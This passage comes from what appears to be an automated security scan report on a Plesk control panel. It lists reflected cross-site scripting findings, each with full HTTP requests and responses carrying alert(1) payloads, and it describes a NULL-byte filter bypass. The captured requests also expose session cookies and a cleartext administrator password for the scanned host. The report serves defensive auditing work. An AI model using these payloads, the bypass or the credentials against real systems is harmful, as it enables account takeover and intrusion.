Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:18:51 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:18:52 GMT
Connection: close
Content-Length: 578

ERROR: PleskFatalException
Command not found: downloadba55a<script>alert(1)</script>fc21a60d71f

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: plesk

0: common_func.php3:73
   psaerror(string 'Command not found: downloadba55a<script>
...[SNIP]...

2.14. https://50.22.21.242:8443/relay [RefererHost parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /relay

Issue detail

The value of the RefererHost request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c24"><script>alert(1)</script>d37422f2d88 was submitted in the RefererHost parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /relay HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2F50.22.21.242%3A8443%2Fadmin%2F
Cookie: locale=en-US; PLESKSESSID=688c16232dad95241024132aaefca808; psaContext=resellers
Content-Type: application/x-www-form-urlencoded
Content-Length: 2121

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxzYW1scDpBdXRoblJlcXVlc3QgeG1sbnM6c2FtbHA9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpwcm90b2NvbCIgeG1sbnM6c2FtbD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydG
...[SNIP]...
up.php3%3Fwindow_id%3D%26requested_url%3Dhttps%253A%252F%252F50.22.21.242%253A8443%252Fadmin%252F&RelayState=aHR0cHM6Ly81MC4yMi4yMS4yNDI6ODQ0My9hZG1pbi8%3D&RefererScheme=https&RefererHost=50.22.21.242a5c24"><script>alert(1)</script>d37422f2d88&RefererPort=8443

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Content-Length: 2124

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<he
...[SNIP]...
<input type="hidden" name="RefererHost" value="50.22.21.242a5c24"><script>alert(1)</script>d37422f2d88" />
...[SNIP]...

2.15. https://50.22.21.242:8443/relay [RefererPort parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /relay

Issue detail

The value of the RefererPort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b0c"style%3d"x%3aexpression(alert(1))"3dddcb70076 was submitted in the RefererPort parameter. This input was echoed as f1b0c"style="x:expression(alert(1))"3dddcb70076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /relay HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/sso/api.php?api=/ui
Cookie: locale=en-US; PLESKSESSID=688c16232dad95241024132aaefca808; psaContext=resellers
Content-Type: application/x-www-form-urlencoded
Content-Length: 963

request_id=g5wrno3s5zalltcrzjqed0oodna3hnttjh&relay_state=sCtAaFtEe-authnFEONHJNQMKIUBui_result-eJx9kl9r2zAUxb%2BLoXtMrD92HYVQysrWwZKydk97EYp1M6t1ZFWyk7gl371XSgJ9KljYvuiee85PUoKL9yAIFZmH4DobQA6%2BzeZY
...[SNIP]...
%2B8e8vl%2BWv8eKLL%2FzcWlwPfFxdferfLj7ky%2FHWfPvJ3FrUy0uUHeqNXghQwocItTjBz9N70Q%3D-c46d89507038a48b22afb61c72a6c53f07b8f0e2&confirmed=true&RefererScheme=https&RefererHost=50.22.21.242&RefererPort=8443f1b0c"style%3d"x%3aexpression(alert(1))"3dddcb70076&user_name=Administrator&user_password=QHjNKge2&addparam_locale=default&send=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Content-Length: 2231

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<he
...[SNIP]...
<input type="hidden" name="RefererPort" value="8443f1b0c"style="x:expression(alert(1))"3dddcb70076" />
...[SNIP]...

2.16. https://50.22.21.242:8443/relay [RefererPort parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /relay

Issue detail

The value of the RefererPort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5906"><script>alert(1)</script>14413631c05 was submitted in the RefererPort parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /relay HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2F50.22.21.242%3A8443%2Fadmin%2F
Cookie: locale=en-US; PLESKSESSID=688c16232dad95241024132aaefca808; psaContext=resellers
Content-Type: application/x-www-form-urlencoded
Content-Length: 2121

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxzYW1scDpBdXRoblJlcXVlc3QgeG1sbnM6c2FtbHA9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpwcm90b2NvbCIgeG1sbnM6c2FtbD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydG
...[SNIP]...
id%3D%26requested_url%3Dhttps%253A%252F%252F50.22.21.242%253A8443%252Fadmin%252F&RelayState=aHR0cHM6Ly81MC4yMi4yMS4yNDI6ODQ0My9hZG1pbi8%3D&RefererScheme=https&RefererHost=50.22.21.242&RefererPort=8443e5906"><script>alert(1)</script>14413631c05

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Content-Length: 2124

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<he
...[SNIP]...
<input type="hidden" name="RefererPort" value="8443e5906"><script>alert(1)</script>14413631c05" />
...[SNIP]...

2.17. https://50.22.21.242:8443/relay [RefererScheme parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /relay

Issue detail

The value of the RefererScheme request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c704d"><script>alert(1)</script>f468a8fc4d3 was submitted in the RefererScheme parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /relay HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2F50.22.21.242%3A8443%2Fadmin%2F
Cookie: locale=en-US; PLESKSESSID=688c16232dad95241024132aaefca808; psaContext=resellers
Content-Type: application/x-www-form-urlencoded
Content-Length: 2121

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxzYW1scDpBdXRoblJlcXVlc3QgeG1sbnM6c2FtbHA9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpwcm90b2NvbCIgeG1sbnM6c2FtbD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydG
...[SNIP]...
22.21.242%3A8443%2Flogin_up.php3%3Fwindow_id%3D%26requested_url%3Dhttps%253A%252F%252F50.22.21.242%253A8443%252Fadmin%252F&RelayState=aHR0cHM6Ly81MC4yMi4yMS4yNDI6ODQ0My9hZG1pbi8%3D&RefererScheme=httpsc704d"><script>alert(1)</script>f468a8fc4d3&RefererHost=50.22.21.242&RefererPort=8443

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Content-Length: 2124

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<he
...[SNIP]...
<input type="hidden" name="RefererScheme" value="httpsc704d"><script>alert(1)</script>f468a8fc4d3" />
...[SNIP]...

2.18. https://50.22.21.242:8443/relay [RelayState parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /relay

Issue detail

The value of the RelayState request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48b1c"><script>alert(1)</script>0cac453d354 was submitted in the RelayState parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /relay HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2F50.22.21.242%3A8443%2Fadmin%2F
Cookie: locale=en-US; PLESKSESSID=688c16232dad95241024132aaefca808; psaContext=resellers
Content-Type: application/x-www-form-urlencoded
Content-Length: 2121

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxzYW1scDpBdXRoblJlcXVlc3QgeG1sbnM6c2FtbHA9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpwcm90b2NvbCIgeG1sbnM6c2FtbD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydG
...[SNIP]...
rl=https%3A%2F%2F50.22.21.242%3A8443%2Flogin_up.php3%3Fwindow_id%3D%26requested_url%3Dhttps%253A%252F%252F50.22.21.242%253A8443%252Fadmin%252F&RelayState=aHR0cHM6Ly81MC4yMi4yMS4yNDI6ODQ0My9hZG1pbi8%3D48b1c"><script>alert(1)</script>0cac453d354&RefererScheme=https&RefererHost=50.22.21.242&RefererPort=8443

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Content-Length: 4396

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<he
...[SNIP]...
<input type="hidden" name="RelayState" value="aHR0cHM6Ly81MC4yMi4yMS4yNDI6ODQ0My9hZG1pbi8=48b1c"><script>alert(1)</script>0cac453d354" />
...[SNIP]...

2.19. https://50.22.21.242:8443/relay [response_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /relay

Issue detail

The value of the response_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8d2"><script>alert(1)</script>b42479a210a was submitted in the response_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /relay HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2F50.22.21.242%3A8443%2Fadmin%2F
Cookie: locale=en-US; PLESKSESSID=688c16232dad95241024132aaefca808; psaContext=resellers
Content-Type: application/x-www-form-urlencoded
Content-Length: 2121

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxzYW1scDpBdXRoblJlcXVlc3QgeG1sbnM6c2FtbHA9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpwcm90b2NvbCIgeG1sbnM6c2FtbD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydG
...[SNIP]...
6U2lnbmF0dXJlPjwvc2FtbHA6QXV0aG5SZXF1ZXN0Pgo%3D&response_url=https%3A%2F%2F50.22.21.242%3A8443%2Flogin_up.php3%3Fwindow_id%3D%26requested_url%3Dhttps%253A%252F%252F50.22.21.242%253A8443%252Fadmin%252F5c8d2"><script>alert(1)</script>b42479a210a&RelayState=aHR0cHM6Ly81MC4yMi4yMS4yNDI6ODQ0My9hZG1pbi8%3D&RefererScheme=https&RefererHost=50.22.21.242&RefererPort=8443

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Content-Length: 4480

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<he
...[SNIP]...
<form id="pb_autopost_form" action="https://50.22.21.242:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2F50.22.21.242%3A8443%2Fadmin%2F5c8d2"><script>alert(1)</script>b42479a210a" method="post">
...[SNIP]...

2.20. https://50.22.21.242:8443/smb/app/applications-list-data/catalogId/apscatalog [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /smb/app/applications-list-data/catalogId/apscatalog

Issue detail

The value of the category request parameter is copied into the HTML document as plain text between tags. The payload 95da6<img%20src%3da%20onerror%3dalert(1)>19f37470367 was submitted in the category parameter. This input was echoed as 95da6<img src=a onerror=alert(1)>19f37470367 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /smb/app/applications-list-data/catalogId/apscatalog?category=95da6<img%20src%3da%20onerror%3dalert(1)>19f37470367&cert=any HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Referer: https://50.22.21.242:8443/smb/app/available/id/apscatalog
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:11:44 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:11:44 GMT
Content-Length: 871

{"list":"<div class=\"no-category-selected\">No applications are available in this category. Select another category.<\/div>","navigation":"<a href=\"#\" onclick=\"apsCatalog.returnToHome()\">Home<\/a
...[SNIP]...
<a href=\"#\" onclick='apsCatalog.showCategory(\"95da6\\x3Cimg src=a onerror=alert(1)\\x3E19f37470367\");'>95da6<img src=a onerror=alert(1)>19f37470367<\/a>
...[SNIP]...

2.21. https://50.22.21.242:8443/smb/email-address/create [autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /smb/email-address/create

Issue detail

The value of the autoResponder%5BautoResponderSection%5D%5BcontentType%5D request parameter is copied into the HTML document as plain text between tags. The payload 5f814<img%20src%3da%20onerror%3dalert(1)>d00ff45c8b9 was submitted in the autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter. This input was echoed as 5f814<img src=a onerror=alert(1)>d00ff45c8b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /smb/email-address/create HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/email-address/create
Content-Length: 949
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=customers
Pragma: no-cache
Cache-Control: no-cache

general%5BgeneralSection%5D%5Bname%5D=xssme&general%5BgeneralSection%5D%5Bpostbox%5D=0&general%5BgeneralSection%5D%5Bpostbox%5D=1&general%5BgeneralSection%5D%5BmboxQuotaValue%5D=-1&general-generalSect
...[SNIP]...
s%5BaliasesSection%5D%5BaliasesForm%5D%5BdynamicSubFormTemplate%5D%5BaliasName%5D=&autoResponder%5BautoResponderSection%5D%5Benabled%5D=0&autoResponder%5BautoResponderSection%5D%5BcontentType%5D=false5f814<img%20src%3da%20onerror%3dalert(1)>d00ff45c8b9&autoResponder%5BautoResponderSection%5D%5BforwardAddress%5D=&autoResponder%5BautoResponderSection%5D%5Battachments%5D%5BdynamicSubFormTemplate%5D%5Bfile%5D=&antivirus%5BantivirusSection%5D%5Benabled%
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:24:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:24:33 GMT
Content-Length: 317

{"formMessages":{"general":{"generalSection":{"name":{"recordFound":"The specified e-mail address is already in use."}}},"autoResponder":{"autoResponderSection":{"contentType":{"notInArray":"'false5f814<img src=a onerror=alert(1)>d00ff45c8b9' was not found in the haystack"}}}},"status":"success","statusMessages":[]}

2.22. https://50.22.21.242:8443/smb/my-profile [general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /smb/my-profile

Issue detail

The value of the general%5Bvcard%5D%5Bemail%5D%5BemailType%5D request parameter is copied into the HTML document as plain text between tags. The payload 466ab<img%20src%3da%20onerror%3dalert(1)>4aa12791126 was submitted in the general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter. This input was echoed as 466ab<img src=a onerror=alert(1)>4aa12791126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /smb/my-profile HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/my-profile
Content-Length: 876
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=external466ab<img%20src%3da%20onerror%3dalert(1)>4aa12791126&general%5Bvcard%5D%5Bemail%5D%5BexternalEmail%5D=xss%40xss.cx&general%5Baccount%5D%5BuserLogin%5D=admin&general%5Baccount%5D%5Bpassword%5D=&general%5Baccount%5D%5BpasswordConfirmation%5D=&general%5Ba
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:32:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:32:56 GMT
Content-Length: 338

{"formMessages":{"general":{"vcard":{"email":{"externalEmail":{"recordFound":"The e-mail address xss@xss.cx is associated with another user (xss). Please specify another address."},"emailType":{"notInArray":"'external466ab<img src=a onerror=alert(1)>4aa12791126' was not found in the haystack"}}}}},"status":"success","statusMessages":[]}

2.23. https://50.22.21.242:8447/preferences.html [login parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8447
Path:   /preferences.html

Issue detail

The value of the login request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3432"%20style%3dx%3aexpression(alert(1))%20cfd59f25d46 was submitted in the login parameter. This input was echoed as f3432" style=x:expression(alert(1)) cfd59f25d46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /preferences.html HTTP/1.1
Host: 50.22.21.242:8447
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8447/preferences.html
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=xvrjftqfoptegfsokqpykqdf
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

login_locale=en_US&login=Administratorf3432"%20style%3dx%3aexpression(alert(1))%20cfd59f25d46&password=QHjNKge2

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionID=ouhymmzgtdaqakoglnanbrbl


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="con
...[SNIP]...
<input type="text" name="login" value="Administratorf3432" style=x:expression(alert(1)) cfd59f25d46" />
...[SNIP]...

3. Password returned in later response  previous  next
There are 18 instances of this issue:

Issue description

Passwords submitted to the application are returned in clear form in later responses from the application. This behaviour increases the risk that users' passwords will be captured by an attacker. Many types of vulnerability, such as weaknesses in session handling, broken access controls, and cross-site scripting, would enable an attacker to leverage this behaviour to retrieve the passwords of other application users. This possibility typically exacerbates the impact of those other vulnerabilities, and in some situations can enable an attacker to quickly compromise the entire application.

Issue remediation

There is usually no good reason for an application to return users' passwords in its responses. This behaviour should be removed from the application.


3.1. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
